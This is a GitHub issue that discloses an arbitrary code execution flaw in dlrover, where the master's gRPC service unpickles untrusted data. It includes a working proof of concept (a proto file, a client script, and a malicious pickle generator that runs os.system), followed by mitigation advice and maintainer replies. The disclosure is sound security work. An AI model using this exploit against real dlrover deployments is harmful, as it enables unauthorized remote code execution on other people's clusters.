Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Security Vulnerability Report: Arbitrary Code Execution via Deserialization in dlrover's GRPC Service #1400

Open
12end opened this issue Dec 20, 2024 · 5 comments
Labels

Comments

@12end
Copy link

12end commented Dec 20, 2024

Summary

A critical security vulnerability has been identified in the dlrover project, specifically within the Python module python/common/grpc.py. The function deserialize_message is susceptible to a deserialization flaw when handling gRPC messages. This issue can be exploited by an attacker with access to the dlrover-master gRPC service running on port 50001, potentially allowing for arbitrary code execution and unauthorized system access.

Affected Components

dlrover version(s) affected: All versions up until the date of this report.
Component: python/common/grpc.py
Function: deserialize_message

Impact

The dlrover-master exposes a gRPC endpoint on port 50001 for worker nodes to connect. When this service is deployed in a Kubernetes cluster, the port is exposed as a service, making it accessible by any container within the cluster under default configurations. An attacker could exploit this vulnerability by sending a maliciously crafted pickle data through the Message's data field, leading to remote code execution upon deserialization.

Technical Details

The Message protocol buffer message includes a bytes field named data, which is intended to carry serialized Python objects using the pickle format. However, pickle is known to be unsafe for deserializing untrusted data as it can execute arbitrary code during the deserialization process.

Proof of Concept (PoC)

Below is a simplified PoC demonstrating how an attacker might exploit this vulnerability:
elastic_training.proto

syntax = "proto3";

package elastic;

enum TaskType {
  NONE = 0;
  TRAINING = 1;
  EVALUATION = 2;
  PREDICTION = 3;
  WAIT = 4;
  TRAIN_END_CALLBACK = 5;
}

message Response {
  bool success = 1;
  string reason = 2;
}

message Message {
  int32 node_id = 1;
  string node_type = 2;
  // pickle bytes.
  bytes data = 3;
}

service Master {
  rpc report(Message) returns (Response);
  rpc get(Message) returns (Message);
}

exp.py

import grpc
import elastic_training_pb2_grpc
import elastic_training_pb2

def get_request(url: str, file_path: str):
    with grpc.insecure_channel(url) as channel:
        stub = elastic_training_pb2_grpc.MasterStub(channel)
        
        with open(file_path, 'rb') as file:
            data = file.read()

        message = elastic_training_pb2.Message(
            node_id=1,
            node_type="some_node_type", 
            data=data
        )

        response = stub.get(message)
        return response

url = "10.111.5.152:50001"
file_path = "/tmp/payload"
response = get_request(url, file_path)

gen_pickle.py

import os
import pickle

class EvilPickle(object):
    def __reduce__(self):
        return (os.system, ("touch /tmp/pwned",))

pickle_data = pickle.dumps(EvilPickle())
with open("payload", "wb") as file:
     file.write(pickle_data)

command:

pip install grpcio grpcio-tools protobuf
python -m grpc_tools.protoc -I=. --python_out=. --grpc_python_out=. elastic_training.proto
python3 gen_pickle.py
python3 exp.py

By executing the above scripts, an attacker can create a payload that, when deserialized by the dlrover-master, will execute the command touch /tmp/pwned, creating a file at /tmp/pwned on the master.

Recommendations

To mitigate this risk, it is recommended that:

Implementation of RestrictedUnpickler

By implementing a custom unpickler that overrides the find_class method, you can enforce a whitelist of classes that are allowed to be instantiated during the deserialization process. This approach ensures that only trusted classes can be created, thereby reducing the attack surface.

authentication

The dlrover-master gRPC service should implement authentication and authorization mechanisms to restrict access only to trusted entities.

Best regards,

12end@cyberkl

@12end 12end added the report label Dec 20, 2024
@workingloong
Copy link
Collaborator

Thanks for your suggestion. Can we mitigate this risk if we replace GRPC and pickle with HTTP and JSON? IMO, JSON is more safe than pickle.

@12end
Copy link
Author

12end commented Dec 22, 2024

Replacing GRPC and pickle with HTTP and JSON can reduce the risk associated with pickle deserialization vulnerabilities. JSON is indeed generally safer as it doesn't have the same built-in ability to execute arbitrary code like pickle. However, it's not a silver bullet.Proper input validation and sanitization still need to be implemented carefully to prevent other types of attacks. Also, the overall security architecture, including access controls and authentication, needs to be reevaluated and strengthened. If the security of the master cannot be guaranteed, companies using dlrover may encounter the "insider" problem that Bytedance had before.
Of course, I don't intend to exaggerate the dangers and add workload to you or your team. I just raise the issue. It is up to you to decide whether to add various security measures. After all, this will consume some human resources and time.

@merlintang
Copy link
Collaborator

@12end thanks for investigating this issue, let our team to check this again.

@merlintang
Copy link
Collaborator

@samplise

@12end
Copy link
Author

12end commented Dec 23, 2024

The deserialization code is used from here on e92fc20#diff-55f4adaa04015061f621cf129479695bfb877e1dad2d16c5caacb8c14959e7fc

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
Projects
None yet
Development

No branches or pull requests

3 participants